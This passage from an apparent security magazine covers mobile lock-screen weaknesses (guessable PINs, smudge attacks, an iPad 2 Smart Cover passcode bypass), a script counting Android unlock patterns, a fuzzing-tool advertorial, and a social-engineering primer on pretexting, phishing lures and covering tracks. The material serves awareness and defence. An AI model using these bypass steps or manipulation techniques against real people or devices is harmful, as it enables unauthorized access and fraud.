Most Common iPhone Passcodes, 13 June 2011.<br />
http://amitay.us/blog/files/most_common_iphone_<br />
passcodes.php). From almost 205,000 recorded<br />
passcodes, almost 4.5% of them were found to be the<br />
sequence 1234; so put another way, this means that<br />
there’s not much more than a one in twenty chance<br />
of picking up a phone and finding that it’s locked with<br />
this particular PIN. The findings further determined<br />
that, although 10,000 permutations were theoretically<br />
available, 15% of choices logged in the sample group<br />
were based upon just ten different PINs (including the<br />
aforementioned 1234, as well as 0000, 1111 and other<br />
guessable options). The prominence of 198x and 199x<br />
sequences in the wider set of results also enabled<br />
Amitay to infer that a fair number of the other owners<br />
were using their year of birth as their passcode.<br />
In the early days, such PIN protection was arguably<br />
commensurate with the range and volume of data being<br />
held on the devices, but over time security has not<br />
evolved as quickly as other capabilities. So, as handset<br />
storage, communication and software capabilities have<br />
rocketed, the most common enhancement to user<br />
authentication until relatively recently has simply been<br />
to allow a password instead of the PIN. With this in<br />
mind, let’s take a look at how the latest platforms are<br />
taking things forward.<br />
Advancing The Authentication Alternatives<br />
After years of very little changing with mobile device<br />
authentication, the last couple of years have seen a few<br />
departures from the norm, with the most obvious ones<br />
appearing on the Android platform. In addition to standard<br />
PINs and password options, this allows users to unlock<br />
their handset by drawing a secret pattern. The interface<br />
is depicted in Figure 2, and works by drawing a pattern to<br />
connect the dots. The pattern can be 4-9 dots in length,<br />
and can use them in a variety of combinations (although<br />
certain combinations cannot be achieved; for example, it<br />
is not possible to connect the corner dots directly to each<br />
other without selecting another one in between).<br />
A first comment from the security perspective is that,<br />
unless the user is careful when they’re entering the<br />
information, then the pattern unlock process can be<br />
very observable; far more so than a similar-length PIN.<br />
Figure 1. The traditional view of mobile authentication<br />
Figure 2. Android pattern unlock<br />
This partly comes down to the action involved, as the<br />
drawing of the secret gives an observer a continuous<br />
action to watch rather than a series of taps (which are<br />
more difficult to keep track of if you’re trying to watch<br />
what someone else is doing). Also, if a would-be<br />
impostor actually has sight of the user’s screen, then<br />
they may get a glimpse of the overall pattern itself, as<br />
depicted in Figure 2. Although Android offers an option<br />
to make the entry of the pattern invisible, this actually<br />
becomes quite difficult for the authorized user to follow<br />
(i.e. to keep track of their position in a long pattern) and<br />
to tell if they are doing it right. The option to enable<br />
tactile feedback (by means of small vibrations) does<br />
provide some help here to an extent, but it’s still easy to<br />
make a mistake.<br />
Once an impostor gets hold of a device, then it’s<br />
sometimes possible to determine the unlock pattern from<br />
the smudges and smears that the owner’s fingers have<br />
left on the screen. In fact, my first practical encounter<br />
with the pattern unlock technique was when one of my<br />
students had popped out of the room and left his phone on<br />
the table. One of his ‘friends’ then picked it up, looked at<br />
the screen, determined the unlock pattern … and quickly<br />
changed it to something else. Although it was all done in<br />
fun on this occasion, it was a fairly clear illustration of the<br />
vulnerability. The feasibility of such attacks has also been<br />
recognized in the research community, with academics<br />
from the University of Pennsylvania having published a<br />
detailed paper on the topic (Aviv, A.J., Gibson, K., Mossop,<br />
E., Blaze, M. and Smith, J.M. 2010. Smudge Attacks on<br />
Smartphone Touch Screens, in 4th USENIX Workshop<br />
on Offensive Technologies (WOOT’10), Washington DC,<br />
9 August 2010. http://www.usenix.org/events/woot10/<br />
tech/full_papers/Aviv.pdf).<br />
In the same way that they can choose guessable<br />
PINs, there is a risk of users having a tendency towards<br />
predictable patterns (indeed, users already do this with<br />
PINs, with Amitay’s study revealing ‘2580’ to be the third<br />
most popular choice – not an obviously memorable number<br />
until you look at the pattern it traces out on the keypad). In<br />
addition, there’s a reduced set of permutations compared<br />
to an equivalent-length PIN, because the elements of<br />
the pattern are more likely to be adjacent to each other (they<br />
don’t have to be, but it’s more likely to happen as a result of<br />
the way that many users will draw them), and unlike the digits<br />
in a PIN, the positions in the pattern cannot be repeated.<br />
Having said this, the range of valid permutations is still<br />
sufficient to ensure that users have the chance to select<br />
patterns that are far from trivial to break or predictable to guess.<br />
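The reduction in keyspace described above can be checked by enumeration. The following Python script is an added example, not code from the article: it counts every drawable pattern of 4 to 9 dots on the 3x3 grid under the rules the article describes (no dot reused, no stroke skipping over an undrawn dot) and sets each count beside the number of PINs of the same length. It assumes the standard 3x3 grid with dots numbered 0 to 8, row by row.

```python
"""Enumerate Android 3x3 unlock patterns and compare with PIN keyspace.

Added example, not code from the article. Rules applied: every dot in a
pattern is distinct, a pattern is 4 to 9 dots long, and a straight stroke
may not skip over a dot that has not been drawn yet (so two corners cannot
be joined directly unless the dot between them is already in the pattern).
"""

GRID = 3
DOTS = range(GRID * GRID)  # dot i is at row i // 3, column i % 3


def dot_between(a, b):
    """Return the dot lying exactly halfway between dots a and b, or None.

    Only eight unordered pairs have such a dot: the corner-to-corner pairs
    along an edge (0-2, 0-6, 2-8, 6-8) or a diagonal (0-8, 2-6) and the two
    edge-midpoint pairs (1-7, 3-5). Knight-style moves never do.
    """
    ra, ca = divmod(a, GRID)
    rb, cb = divmod(b, GRID)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None
    return ((ra + rb) // 2) * GRID + (ca + cb) // 2


def is_valid_pattern(seq):
    """True if seq is a drawable pattern of 4..9 distinct dots."""
    if not 4 <= len(seq) <= 9 or len(set(seq)) != len(seq):
        return False
    if any(d not in DOTS for d in seq):
        return False
    drawn = set()
    for prev, nxt in zip(seq, seq[1:]):
        drawn.add(prev)
        mid = dot_between(prev, nxt)
        if mid is not None and mid not in drawn:
            return False  # the stroke would jump over an undrawn dot
    return True


def _extend(path, visited, counts):
    """Depth-first extension of path; counts every valid prefix once."""
    if len(path) >= 4:
        counts[len(path)] += 1
    if len(path) == len(visited):
        return
    last = path[-1]
    for nxt in DOTS:
        if visited[nxt]:
            continue
        mid = dot_between(last, nxt)
        if mid is not None and not visited[mid]:
            continue  # skipping an undrawn dot is not allowed
        visited[nxt] = True
        path.append(nxt)
        _extend(path, visited, counts)
        path.pop()
        visited[nxt] = False


def count_patterns():
    """Return {length: number of valid patterns} for lengths 4..9."""
    counts = {n: 0 for n in range(4, 10)}
    for start in DOTS:
        visited = [False] * len(DOTS)
        visited[start] = True
        _extend([start], visited, counts)
    return counts


def keyspace_table():
    """Rows of (length, valid patterns, PINs of the same length)."""
    counts = count_patterns()
    return [(n, counts[n], 10 ** n) for n in sorted(counts)]


if __name__ == "__main__":
    total = 0
    for n, patterns, pins in keyspace_table():
        total += patterns
        print(f"{n} dots: {patterns:>7} patterns vs {pins:>10} equal-length PINs")
    print(f"all lengths together: {total} patterns")
```

Even the longest nine-dot pattern has far fewer possibilities than a nine-digit PIN, but the full set is still large enough that guessing without observation, smudges or a predictable choice is impractical.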
On the positive side, the use of a pattern helps to<br />
guard against sharing – it’s hard to describe your<br />
pattern to someone when compared to passing on a<br />
password or PIN, and so a user would have to spend<br />
time showing someone. However, users may also find<br />
long patterns potentially more difficult to remember<br />
than a numerical sequence of equivalent length,<br />
because they don’t have the opportunity to remember<br />
the information as a meaningful string in its own right.<br />
However, it is arguable that users with better visual/task<br />
memory will find the action of recalling and recreating<br />
the pattern to be an easier proposition.<br />
In addition to the pattern lock, the latest version of<br />
Android, Ice Cream Sandwich (ICS), has taken things<br />
further with the introduction of face recognition. This<br />
leverages the handset’s front-facing camera to enable<br />
the phone to unlock when it sees its owner. However, no<br />
sooner had this appeared than coverage and commentary<br />
started to suggest potential problems, such as the risk of<br />
being able to fool the mechanism by showing it a photo<br />
of the legitimate user, or difficulty of using it in low light<br />
conditions (Kaelin, L. 2011. Android’s face unlock feature<br />
could be fooled by photo, TechSpot, 21 October 2011.<br />
http://www.techspot.com/news/45953-androids-faceunlock-feature-could-be-fooled-by-photo.html).<br />
Given the<br />
right lighting, however, it operates very effectively and<br />
can certainly be accomplished more quickly and with<br />
less effort than entering a PIN or a pattern.<br />
Although faults might be leveled at each of the<br />
techniques in isolation, a key thing is that Android offers<br />
a range of options. So, from a usability perspective, the<br />
user has an increased opportunity of finding something to<br />
suit their preference, and so (in theory at least) has less<br />
of a justification for leaving their device unprotected.<br />
Figure 3. Variations of the iOS passcode: (a) Simple, (b) numeric-only and (c) full character set<br />
By contrast to Android’s advancements, the offerings<br />
on the iOS platform currently feel a bit limited. Despite<br />
Apple actually having been granted a patent on unlocking<br />
a device based upon touchscreen gestures (Chaudhri,<br />
I., Ording, B., Anzures, F.A., Van Os, M., Lemay, S.O.,<br />
Forstall, S. and Christie, G. 2011. Unlocking a device by<br />
performing gestures on an unlock image, United States<br />
Patent 8046721, 25 October 2011), the options available<br />
in iOS 5 at the time of writing are restricted to traditional<br />
PIN and password approaches, the interfaces for which<br />
are depicted in Figure 3. The default mechanism is what<br />
iOS terms the Simple passcode, which is basically a<br />
traditional PIN, fixed to four digits in length. Notably if<br />
you switch this option off, then in addition to letting you<br />
choose more complex strings, iOS will also let you get<br />
away with a single-digit PIN (which implicitly shows that<br />
it’s not doing anything to filter out silly choices either). In<br />
terms of enabling the protection, the phone can be set<br />
to require the passcode immediately, or after 1, 5 or 15<br />
minutes after the device is switched off (with the further<br />
option to auto-lock if left switched on after 1, 2, 3, 4 or 5<br />
minutes, or set not to lock).<br />
Looking at the different screenshots in Figure 3, we<br />
can make some observations about how the interface<br />
differs according to what the user has set as their<br />
passcode. With simple passcode switched on (Figure<br />
3a), the entry screen clearly shows that four digits are<br />
required, whereas with it switched off the user does<br />
not get an indication of the number of characters being<br />
expected. It’s notable that the keys in Figure 3c are<br />
significantly smaller than those on the numeric-only<br />
keypad, and so some users may find it more difficult<br />
to enter the information, particularly if they’re trying to<br />
enter the passcode on the move. This is unfortunate,<br />
as anything that increases the chance of mistakes (and<br />
thereby the risk of being locked out after consecutive<br />
errors) is likely to reduce users’ willingness to enable it.<br />
Thus while it has the potential to offer greater security<br />
than something like Android’s pattern lock, the password<br />
approach is unlikely to be as appealing to use.<br />
Although it doesn’t exactly advertise the fact, a nice<br />
touch with iOS is that it also permits you to use a long<br />
PIN (i.e. more than the standard 4 digits) and still retain<br />
the numeric keypad rather than the full keyboard. The<br />
‘trick’ is to opt to use a password, but then proceed to set<br />
something that is entirely numeric. iOS will recognize that<br />
it’s only using digits, and then present the numeric keypad<br />
rather than the alphabetic one for subsequent entry. This<br />
is depicted in Figure 3b, where it is clear that the user has<br />
to enter a PIN, but iOS is no longer giving away any clue<br />
of how long it’s expected to be. The result for the user is<br />
the potentially useful compromise of being able to enter<br />
a longer passcode, but without having to resort to the<br />
potentially fiddly alphabetic keyboard to do so.<br />
Let Me Through, I’m An Impostor!<br />
Having enabled a lock of some kind, there is also the<br />
question of what people can still get to without needing<br />
to be authenticated. As shown in Figures 2 and 3, it is<br />
standard practice for emergency calls to still be possible<br />
from a locked device, but this is often not the only feature.<br />
For example, the recent launch of the iPhone 4S was<br />
followed by criticism that its Siri personal assistant was<br />
still active with the phone locked (Newman, J. 2011. Siri’s<br />
Security Hole: The Passcode Is the Problem, PCWorld,<br />
20 October 2011. http://www.pcworld.com/article/242253/<br />
siris_security_hole_the_passcode_is_the_problem.html).<br />
This is actually similar to what earlier iPhone users would<br />
find with the normal ‘voice control’ feature, which (unless<br />
disabled in the settings) allowed access to the phonebook<br />
to make calls or to the music library to play tracks. The<br />
difference with Siri was that it exposed a much greater<br />
range of functionality, such as the ability to send texts and<br />
emails, while the phone was otherwise still locked. In no<br />
sense was it a security oversight, as the iOS settings offer<br />
an explicit option for whether Siri should still be accessible<br />
when the phone is locked, but criticism could be leveled for<br />
making this the default configuration. This again highlights<br />
the balancing act that’s required in terms of what should be<br />
left accessible for the convenience of the owner, versus<br />
what needs to be kept off-limits for their protection. For<br />
example, regardless of Siri, the iOS lock screen still allows<br />
the camera to be used or music to be played, so you<br />
could conceivably take unwanted photos and fill up the<br />
phone’s memory, or have an uninvited nose through the<br />
user’s music collection. Of course, neither of these is<br />
necessarily a major risk in the grand scheme of things, but<br />
it’s also notable that the owner doesn’t have a choice to<br />
disable the features and lock off the phone completely.<br />
In addition to potential configuration weaknesses,<br />
there are sometimes genuine implementation<br />
vulnerabilities waiting to be exploited. In fact, one such<br />
example was publicised while this very article was<br />
being written, with an iOS vulnerability that allowed<br />
the passcode to be bypassed on an iPad 2. The exploit<br />
basically involved holding down the power button until<br />
slide to power off appeared, then closing the Smart<br />
Cover, re-opening it and selecting ‘Cancel’ (9to5Mac.<br />
2011. Anyone with a Smart Cover can break into your<br />
iPad 2, 20 October 2011. http://9to5mac.com/2011/10/<br />
20/anyone-with-a-smart-cover-can-break-into-youripad-2/).<br />
Doing so appeared to unlock the device and<br />
give an impostor access to whatever was on the screen<br />
before it was locked. If the user had been running<br />
an app, then the impostor could see (and to some<br />
extent interact with) whatever was left on view. So,<br />
for example, if Mail was open, an impostor could look<br />
through the messages, or perhaps merrily go looking<br />
at web history in Safari. Alternatively, if the iPad had<br />
been left on the home screen, then the impostor could<br />
browse around and see what was installed. Trying to<br />
run an app quickly revealed that nothing would actually<br />
launch, as the device was still semi-locked, but some<br />
things could still be done to compromise both the<br />
integrity and confidentiality of the device. Specifically,<br />
apps could be deleted, and the search screen could still<br />
be used, with the results list from the latter potentially<br />
giving access to a wealth of confidential tidbits including<br />
contacts, schedule entries, and messages.<br />
Conclusions<br />
It is clear from many of the observations that our<br />
opportunities to protect mobile devices have not kept<br />
pace with the ways in which we’re now able to use<br />
them. The positive news is that there are now signs<br />
of this changing, with attention being given towards<br />
point-of-entry (PoE) approaches that people may feel<br />
more inclined to use. In addition, ongoing research is<br />
considering composite, non-intrusive approaches that<br />
have the potential to provide a measure of protection<br />
beyond the PoE judgement (Furnell, S., Clarke, N. and<br />
Karatzouni, S. 2008. Beyond the PIN: Enhancing user<br />
authentication for mobile devices, Computer Fraud &<br />
Security, August 2008, pp12-17). However, the level<br />
of protection that can be achieved on some devices<br />
will still lag behind what can be done on a full desktop<br />
system, and so if really sensitive data is at stake there<br />
remains a question of whether it ought to find its way<br />
onto a mobile device in the first place.<br />
PROF. STEVEN FURNELL<br />
Prof. Steven Furnell is the head of the Centre for Security,<br />
Communications & Network Research at Plymouth University<br />
in the United Kingdom, and an Adjunct Professor with Edith<br />
Cowan University in Western Australia. His interests include<br />
security management and culture, computer crime, user<br />
authentication, and security usability. Prof. Furnell is active<br />
within three working groups of the International Federation<br />
for Information Processing (IFIP) – namely Information<br />
Security Management, Information Security Education, and<br />
Human Aspects of Information Security & Assurance. He is the<br />
author of over 210 papers in refereed international journals<br />
and conference proceedings, as well as books including<br />
Cybercrime: Vandalizing the Information Society (2001) and<br />
Computer Insecurity: Risking the System (2005). Further<br />
details can be found at www.plymouth.ac.uk/cscan.<br />
WHAT IS A GOOD FUZZING TOOL?<br />
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is<br />
based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hackers<br />
and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous<br />
data causes an abnormal reaction such as a crash in the target software, then you have found a critical security flaw.<br />
In this article, we will highlight the most important requirements in a fuzzing tool and also look at the most common<br />
mistakes people make with fuzzing.<br />
PROPERTIES OF A GOOD<br />
FUZZING TOOL<br />
There is an abundance of fuzzing tools available. How do you distinguish<br />
a good fuzzer, and what are the qualities that a fuzzing tool<br />
should have?<br />
Model-based test suites: Random fuzzing will certainly give you<br />
some results, but to really target the areas that are most at risk, the<br />
test cases need to be based on actual protocol models. This results<br />
in a huge improvement in test coverage and a reduction in test execution<br />
time.<br />
Easy to use: Most fuzzers are built for security experts, but in QA<br />
you cannot expect that all testers understand what buffer<br />
overflows are. A fuzzing tool must come with all the security know-how<br />
built in, so that testers only need the domain expertise of<br />
the target system to execute tests.<br />
Automated: Creating fuzz test cases manually is a time-consuming<br />
and difficult task. A good fuzzer will create test cases automatically.<br />
Automation is also critical when integrating fuzzing into regression<br />
testing and bug reporting frameworks.<br />
Test coverage: Better test coverage means more discovered<br />
vulnerabilities. Fuzzer coverage must be measurable in two<br />
aspects: specification coverage and anomaly coverage.<br />
Scalable: Time is almost always an issue when it comes to testing.<br />
The user must also have control over the fuzzing parameters such as test<br />
coverage. In QA you rarely have much time for testing, and therefore<br />
need to run tests fast. Sometimes you can spend more time on testing,<br />
and can select other test completion criteria.<br />
Documented test cases: When a bug is found, it needs to be<br />
documented for your internal developers or for vulnerability<br />
management towards third party developers. When there are<br />
billions of test cases, automated documentation is the only possible<br />
solution.<br />
Remediation: All found issues must be reproduced in order to fix<br />
them. Network recording (PCAP) and automated reproduction<br />
packages help you in delivering the exact test setup to the developers<br />
so that they can start developing a fix to the found issues.<br />
MOST COMMON MISTAKES IN<br />
FUZZING<br />
Not maintaining proprietary test scripts: Proprietary test<br />
scripts are not rewritten even though the communication interfaces<br />
change or the fuzzing platform becomes outdated and unsupported.<br />
Ticking off the fuzzing check-box: If the requirement for testers<br />
is to do fuzzing, they almost always choose the quick and dirty<br />
solution. This is almost always random fuzzing. Test requirements<br />
should focus on coverage metrics to ensure that testing aims to<br />
find most flaws in software.<br />
Using hardware test beds: Appliance-based fuzzing tools<br />
become outdated really fast, and the speed requirements for the<br />
hardware increase each year. Software-based fuzzers are scalable<br />
in performance, can easily travel with you to where testing is<br />
needed, and are not locked to a physical test lab.<br />
Unprepared for cloud: A fixed location for fuzz-testing makes it<br />
hard for people to collaborate and scale the tests. Be prepared for<br />
virtual setups, where you can easily copy the setup to your<br />
colleagues, or upload it to cloud setups.
SOCIAL FRAUD<br />
Social Engineering<br />
Cyber security is an increasingly serious issue for the whole<br />
world, with intruders attacking large corporate organizations with<br />
the motive of getting access to restricted content. The CSI Computer<br />
Crime and Security Survey report for the year 2010-2011 stated<br />
that almost half of the respondents had experienced a security<br />
incident, with 45.6% of them reporting that they had been the subject<br />
of at least one targeted attack.<br />
By merely trying to prevent infiltration on a technical<br />
level and ignoring the physical-social level,<br />
one hundred percent security can never be achieved.<br />
A couple of examples are the scenes from Hackers<br />
which show dumpster diving in the target company’s<br />
trash in order to obtain financial data from printouts, and<br />
the scene from War Games where Matthew Broderick’s<br />
character studied his target before attempting to crack<br />
the password of the military computer system. Social<br />
Engineering is a threat that is overlooked in most<br />
organizations but can easily be exploited, as it<br />
takes advantage of human psychology rather than<br />
the technical barricades that surround the complete<br />
system. Below is a classic example of this:<br />
A person receives an e-mail in his official mailbox<br />
saying that his computer has been infected with a virus.<br />
The message provides a link and suggests that he<br />
download and install the tool from the link to eliminate<br />
the virus from his computer. The person, in a state of<br />
confusion, clicks on the link to remove the virus from<br />
his computer, but unwittingly gives a hacker an easy<br />
entrance into his corporate network.<br />
To ensure complete security of an organization from<br />
all kinds of internal and external factors, the security<br />
consultant must have complete knowledge of the Social<br />
Engineering cycle, the techniques that can be used by<br />
an attacker and the counter-measures to reduce the<br />
likelihood of success of the attack.<br />
In this paper we are going to take you through the<br />
various phases so as to understand what Social<br />
Engineering is, the Social Engineering Lifecycle, the various<br />
techniques used in Social Engineering attacks with<br />
detailed examples, and then finally conclude with the<br />
counter-measures to protect against each of the Social<br />
Engineering attack techniques.<br />
Definition(s) of Social Engineering<br />
The term Social Engineering can be defined in various<br />
ways, relating to both physical and cyber aspects of that<br />
activity. Wikipedia defines social engineering as:<br />
“...the art of manipulating people into performing actions or<br />
divulging confidential information”.<br />
Other authors have provided the following definitions:<br />
“An outside hacker’s use of psychological tricks on legitimate users<br />
of a computer system, in order to obtain information he needs to<br />
gain access to the system”.<br />
“The practice of deceiving someone, either in person, over the<br />
phone, or using a computer, with the express intent of breaching<br />
some level of security either personal or professional”.<br />
“Social Engineering is a non-technical kind of intrusion relying<br />
heavily on human interaction which often involves tricking other<br />
people into breaking normal security procedures”; the attacker uses<br />
social skills and human interaction to obtain information about<br />
an organization or its computer systems.<br />
In reality, Social Engineering can be any of these<br />
definitions depending on the circumstances that<br />
surround the attack. Social Engineering is actually a<br />
hacker’s manipulation of the natural human tendency<br />
to trust so as to get sensitive information needed to<br />
gain access to a system. Social Engineering does not<br />
require a high level of technical expertise, but requires<br />
the individual to have decent social skills.<br />
For several decades, many people have used social<br />
engineering as a method to research and collect<br />
data. These early social engineers would use the<br />
gathered information as a form of blackmail against<br />
other organizations. Social engineering has been<br />
used to gain unauthorized access into several huge<br />
organizations. A hacker who spends several hours<br />
trying to break passwords could save a great deal of<br />
time by calling up an employee of the organization,<br />
posing as a helpdesk or IT employee, and simply<br />
asking for it.<br />
The Social Engineering Life Cycle<br />
Every Social Engineering attack is unique, but with<br />
a little understanding of the situations encountered,<br />
we can draft a rough cycle of all the activities that a<br />
Social Engineering project goes through leading to a<br />
successful outcome.<br />
Figure 1 shows a general representation of the<br />
Social Engineering Life Cycle in four main stages.<br />
Footprinting<br />
It is the technique of accumulating information regarding<br />
the target(s) and the surrounding environment.<br />
Footprinting can reveal the individuals related to<br />
the target with whom the attacker has to establish<br />
a relationship, so as to improve the chances of a<br />
successful attack.<br />
The information gathered during the Footprinting<br />
phase includes but is not limited to:<br />
• List of employee names and phone numbers<br />
• Organization Chart<br />
• Department Information<br />
• Location information<br />
Footprinting generally refers to one of the pre-attack<br />
phases; tasks performed prior to doing the actual<br />
Social Engineering attack.<br />
Tools such as creepy, SET and Maltego make<br />
Social Engineering engagements easier.<br />
Establishing Trust<br />
Once the possible targets have been listed, the<br />
attacker then moves on to develop a relationship with the<br />
target, who is usually an employee or someone working in<br />
the business, so as to build a good rapport with them.<br />
The trust that the social engineer is gaining will later<br />
be used to unveil confidential pieces of information that<br />
could cause severe harm to the business.<br />
Psychological Manipulation<br />
In this step, the social engineer exploits the trust<br />
that he has gained in the previous phase so as to<br />
extract as much confidential information as possible, or to get sensitive<br />
operations on the target system performed by<br />
the employee himself, so as to penetrate the system<br />
with much ease.<br />
Once all the required sensitive information has been<br />
collected, the social engineer may move on to the next<br />
target or move towards exploiting the actual system<br />
under consideration.<br />
The Exit<br />
Now, after all the required information has been extracted,<br />
the Social Engineer has to make a clean exit in such<br />
a way as not to draw any kind of unnecessary<br />
suspicion to himself.<br />
He makes sure not to leave any kind of proof of his<br />
visit that could lead to a trace-back to his real identity or<br />
link him to the unauthorized entry into the target system<br />
in the future.<br />
The Human Behavior<br />
Every Social Engineer targets specific behavioral traits<br />
in the victim so as to extract maximum information out of<br />
him. These behavioral traits include but are not limited to:<br />
Figure 1. The Social Engineering Life Cycle<br />
Page 25 http://pentestmag.com
Excitement of Victory<br />
Mr. X gets an e-mail stating: “You have won 1 Million Dollars. To claim the winning amount, fill in the attached document and forward it to the email id XXXX@XXXX.com. Switch off your antivirus, as it may block the download due to the highly encrypted Digital Signature of the documents.” Out of excitement he switches off his antivirus, proceeds as instructed, downloads the document and opens it, but finds it corrupted. Little does he know that he has just downloaded malware onto his machine which allows the email sender to gain remote access to it.<br />
Fear of Authority<br />
Many people are apprehensive in the presence of someone they perceive as an authority figure; it is not the person themselves they are apprehensive about but, most likely, the position and power of that person that intimidates them and makes them.<br />
The attackers take on roles of authority figures such<br />
as law enforcement officers or high-ranking company<br />
officials to extract sensitive organizational information<br />
from the victims.<br />
Desire to be helpful<br />
Keith A. Rhodes, chief technologist at the U.S. General Accounting Office, which has a Congressional mandate to test the network security at 24 different government agencies and departments, said in one of his interviews: “Companies train their people to be helpful, but they rarely train them to be part of the security process. We use the social connection between people, their desire to be helpful.”<br />
People, in their desire to be helpful and to solve other people’s queries, give out a lot of information that otherwise should not be disclosed to an outsider, as it could give an attacker a chance to gain unauthorized access to the target system, causing a possible loss.<br />
Figure 2. Social Engineering Techniques<br />
SOCIAL FRAUD<br />
Fear of Loss<br />
Mr. X gets an e-mail stating: “You have won 1 Million Dollars. To claim the winning amount, deposit $75,000 in Account number XXXXXX within 10 days of receiving this e-mail, failing which the winning amount will be declared unclaimed and there will be a new lucky draw to decide the next winner.” Out of fear that he might lose such a good opportunity, he deposits the amount to the account number provided. When his subsequent replies to the e-mail address go unanswered for the next two months and the 1 Million Dollars is never deposited to his account, he understands that he has been scammed.<br />
Laziness<br />
All of us have come across some job or other that requires us to do only a specified set of activities and not look around for better ways of doing them. This causes boredom to the person who performs the same task repeatedly on a daily basis, and over time he learns shortcuts to do the tasks with minimal effort while still meeting the targets.<br />
Such individuals over a period of time become lazy and are susceptible to attackers, who target them knowing that they will get the required information with much ease due to the laid-back attitude of these individuals towards their work.<br />
Ego<br />
Many a time, the attacker makes the person more emotionally sure of himself or herself, thus removing the logical awareness of the security breach that is occurring.<br />
The result is that the person being hacked senses no harm in providing whatever it is that the attacker is requesting. The reason such an attack succeeds is that the attacker is a receptive audience for victims to display how much knowledge they have.<br />
Insufficient knowledge<br />
Knowledge about the target system is one of the key factors that differentiates the attacker from the other employees of the organization. Many a time, due to a lack of proper training, the employees are themselves not sure whether they have complete knowledge about the product, and Social Engineers take advantage of such situations by creating a sense of urgency, not allowing the employee much time to think and to understand that they are under attack.<br />
The Weapons of a Social Engineer<br />
The old-fashioned technical way of breaking into computer systems by brute-forcing user logins or ports has now been replaced by sophisticated methods that are not only easier but yield better and faster results, based on human psychology. These attacks can help the attacker get access to any system irrespective of the platform, software or hardware involved.<br />
How exactly does a person go about carrying out a Social Engineering attack? Figure 2 shows some of the most popular techniques used to perform a Social Engineering attack.<br />
Shoulder Surfing<br />
Shoulder surfing is a security attack wherein the attacker uses observational techniques, such as looking over someone’s shoulder, to get information while they are performing some action that involves explicit use of sensitive, visible information. This can be performed at close range as well as at long range using binoculars or other vision-enhancing devices.<br />
Dumpster Diving<br />
Many a time, huge organizations carelessly dump items like company phone books, system manuals, organizational charts, company policy manuals, calendars of meetings, events and vacations, printouts of sensitive data or login names and passwords, printouts of source code, disks and tapes, company letterhead and memo forms, and outdated hardware into the company dumpsters. The attacker can use these items to get a huge amount of information about the company’s organization and network structure.<br />
This method of searching through the dumpster, looking for potentially useful information discarded by a company’s employees, is known as Dumpster Diving.<br />
Role playing<br />
It is one of the key weapons of a Social Engineer. It involves persuading people or gathering information through an online chat session, emails, phone or any other method that your company uses to interact online with the public, while pretending to be a helpdesk operator, employee, technician, helpless user or important user, in order to get them to divulge confidential information.<br />
Trojan horses<br />
It is one of the most predominant methods currently used by hackers. It involves tricking the victim into downloading a malicious file to the system which, on execution, creates a backdoor in the machine that can be used by the attacker at any time in the future, thus giving him complete access to the victim’s machine.<br />
Phishing<br />
It is the act of creating and using websites and e-mails designed to look like those of well-known legitimate businesses, financial institutions and government agencies in order to deceive Internet users into disclosing their personal information: falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.<br />
Surfing Organization Websites & Online Forums<br />
A huge amount of information regarding the organization’s structure, email ids and phone numbers is available openly on the company website and other forums. This information can be used by the attacker to refine his approach and create a plan of whom to target and the method to be used.<br />
Reverse Social Engineering<br />
A reverse social engineering attack is an attack in which the attacker convinces the target that he has a problem, or might have a certain problem in the future, and that the attacker is ready to help solve the problem. Reverse social engineering involves three parts:<br />
• Sabotage: After the attacker gains some access to the system, he corrupts the system or gives it the appearance of being corrupted. When the user sees the system in the corrupted state, he starts looking for help to solve the problem.<br />
• Marketing: In order to make sure that the user approaches the attacker with the problem, the attacker advertises himself as the only person who can solve the problem.<br />
• Support: In this step, he gains the trust of the target and obtains access to sensitive information.<br />
Defense against Social Engineering<br />
There is no effective way to protect against a Social Engineering attack, because no matter what controls are implemented, there is always the human factor which influences the behavior of an individual.<br />
But there are ways to reduce the likelihood of the attack succeeding. It is also important for organizations to establish a clear and strong security policy and processes to reduce the threat of social engineering. The following are some of the steps to ensure protection against Social Engineering attacks:<br />
Security Awareness Trainings<br />
Security Awareness is the simplest solution for preventing Social Engineering attacks. Every person in the organization must be given basic security awareness training on a timely basis: he/she should never give out any information without the appropriate authorization and should report any suspicious behavior.<br />
Background Verification<br />
There is a real chance that an attacker may join the company as an employee so as to gather insider information about the company. This makes background screening a really important part of company policy for countering Social Engineering attacks. It should not be limited to internal employees but must also be extended to vendors and other contractual workers before they become part of the organization or are given access to the organization’s network.<br />
Physical security<br />
There should be a proper access control mechanism in place to make sure that only authorized people are allowed access to restricted sections of the organization. There should be no tailgating.<br />
Limited data leakage<br />
There should be constant monitoring of what information about the organization is floating around on the World Wide Web. Any kind of irregularity should be taken care of immediately. This will make passive information gathering difficult for the attacker.<br />
Mock Social Engineering drills<br />
Mock Social Engineering exercises should be performed against the internal employees of the organization, by either the security team or a vendor, so as to keep track of the security awareness levels in the organization.<br />
Data Classification policy<br />
There should be proper classification of data on the basis of its criticality level and the personnel allowed to access it.<br />
Data classification assigns a level of sensitivity to<br />
company information.<br />
Each level of data classification includes different<br />
rules for viewing, editing and sharing of the data. It helps<br />
to deter social engineering by providing employees a<br />
mechanism for understanding what information can be<br />
disclosed and what cannot be shared without proper<br />
authorization.<br />
Some other controls that should be put in place to reduce the success of a Social Engineering attack are listed below:<br />
• Install and maintain firewalls, anti-virus and anti-spyware software, and email filters.<br />
• Never allow people to tailgate with you.<br />
• There should be a proper Incident Response strategy set for the organization.<br />
• Usage of corporate IDs on public domains, blogs, discussion forums etc. should be restricted.<br />
• Pay attention to the URL of a web site. Though malicious web sites generally look identical to a legitimate site, the URL may use a variation in spelling or a different domain.<br />
• Confidential and critical online resources like the corporate mailbox should not be accessed in public places such as cafes and hotels, where Internet security cannot be trusted.<br />
• Don’t send sensitive information over the Internet before checking a web site’s security.<br />
• Don’t reveal personal or financial information in<br />
email, and do not respond to email solicitations<br />
requesting this information.<br />
• Ensure all physical entry and exit points are<br />
secured at all times.<br />
• Do not provide personal information or information<br />
about your organization to anyone unless you<br />
are certain of the person’s authority to have that<br />
information.<br />
• Use virtual keyboard where applicable.<br />
• Be very careful what is provided on your company<br />
web site. Avoid posting organizational charts or lists<br />
of key people wherever possible.<br />
• Make sure to shred any document that is discarded<br />
that may contain sensitive data.<br />
